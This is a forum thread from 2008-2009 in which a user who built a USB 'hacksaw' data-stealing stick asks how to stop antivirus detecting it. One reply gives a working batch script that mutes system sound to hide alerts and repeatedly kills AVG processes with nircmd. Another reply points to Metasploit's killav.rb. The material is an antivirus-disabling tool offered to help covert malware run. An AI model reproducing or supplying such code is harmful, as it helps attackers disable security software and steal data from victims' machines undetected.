snow-man Posted December 30, 2008 Posted December 30, 2008 I have made a usb hacksaw thingy and i would like to make a script that will disable any anti virus How can i do this/ Every time i plus the usb stick in to my laptop avast and mcafee detects it. Quote
Nizmon Posted December 30, 2008 Posted December 30, 2008 Hey snow-man, Try this: ::Abigwar's First Attempt at Batch AVkiller ::Mute the system volume, in case of audible AV Alerts (Avast!) nircmd mutesysvolume 1 ::Kill AVG Command Center nircmd killprocess avgcc.exe ::Kill other AVG Processes nircmd killprocess avgemc.exe nircmd killprocess avgupsvc.exe nircmd killprocess avgamsvr.exe ::Restore system volume at end of switchblade nircmd mutesysvolume 0 and ::Theoretical Loop batch :Start nircmd killprocess avgcc.exe nircmd killprocess avgemc.exe nircmd killprocess avgupsvc.exe nircmd killprocess avgamsvr.exe IF EXIST SWITCHDONE.TXT GOTO END GOTO START :END delete switchdone.txt http://hak5.org/forums/index.php?showtopic...p;hl=killing+av Thank Abigwar for this. Let me know what happens. Nizmon Quote
l4rrydav1d Posted November 7, 2009 Posted November 7, 2009 I have made a usb hacksaw thingy and i would like to make a script that will disable any anti virus How can i do this/ Every time i plus the usb stick in to my laptop avast and mcafee detects it. Check out killav.rb from metasploit here: http://dev.metasploit.com/redmine/projects...reter/killav.rb Quote
catchyanow Posted December 6, 2009 Posted December 6, 2009 Check out killav.rb from metasploit here: http://dev.metasploit.com/redmine/projects...reter/killav.rb ummmmmmm. its an rb file so how the hell do i open it? Quote
Canis Posted December 6, 2009 Posted December 6, 2009 ummmmmmm. its an rb file so how the hell do i open it? This might help you : http://www.fileinfo.com/extension/rb Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.